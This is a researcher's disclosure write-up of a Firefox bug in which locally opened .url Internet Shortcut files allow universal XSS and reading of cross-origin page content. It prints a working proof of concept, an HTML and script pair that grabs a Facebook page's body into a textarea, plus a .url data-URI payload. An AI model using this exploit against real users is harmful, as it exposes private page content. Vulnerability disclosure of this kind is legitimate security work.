FireFox Universal XSS and Local File Disclosure (SEC-MODERATE)


Few months back, I reported and wrote about a behavior in FireFox which was deemed by design. The writeup was Firefox Arbitrary Local File Disclosure where a user can read the files in the same directory as an opened HTML file.

In this writeup we will see how that behavior helped us achieve a serious vulnerability in FireFox in conjunction with a bypass that only works on locally opened documents.

I remember tweeting about the .URL file a while back, which is an 'Internet Shortcut' file and to sum up its usage, its essensially a file that you can open on a desktop which in turn will direct your default browser to the website.

Is there #XSS possibility?:
content of 'file://C:/q.url':
[InternetShortcut]\nURL=data:text/html,<b>a</b>
Open with #IE11 @0x6D6172696F

— Abdulrhman Alqabandi (@Qab) September 22, 2015
Firefox is one of the only browsers (other than IE) that handles .URL files specifically (and .desktop files for Ubuntu which do the same) and so I simply opened a .URL using firefox locally and the reference to that window was always 100% accessable.
This meant I could open a window (or an iframe) to any file on the system including websites and be able to read all of the data (using something like URLWindow.document.body.innerHTML).

The PoC

The following is the original PoC reported:

<a href="p.url" target="qab" id="qAnchor">With .url (will bypass)</a><br>

<textarea style="width:600px;height:700px;" id="qresult"></textarea>
<script>
var q;
qAnchor.onclick=function(){
	setTimeout(function(){
		q=open('https://m.facebook.com/#1','qab');
		
		setTimeout(function(){
			qresult.value=q.document.body.innerHTML;
		},1500);
	},2500);
}
</script>

The contents of 'p.url':
[InternetShortcut]
URL=https://m.facebook.com/

What's happening is:

1- User opens a .URL file using an anchor tag and name of window will be 'qab'
2- The opened 'qab' window will redirect to facebook
3- There is a mouse event listener which will simply get a reference to the opened window using window.open + the known name 'qab'
4- Facebooks page is copied into the text area

After that we basically have a window reference inside 'q' which is 100% accessible by us from the original window.



Worth pointing out I managed to reduce the steps required for a potential victim by just having a potential victim simply save a web page and open that web page locally.


References:

The Bugzilla report: https://bugzilla.mozilla.org/show_bug.cgi?id=1278013 (Note: The report is still hidden)
Ubuntu .URL equal, the .DESKTOP: https://help.ubuntu.com/community/UnityLaunchersAndDesktopFiles
Mozilla security bulletin: https://www.mozilla.org/en-US/security/advisories/mfsa2016-80/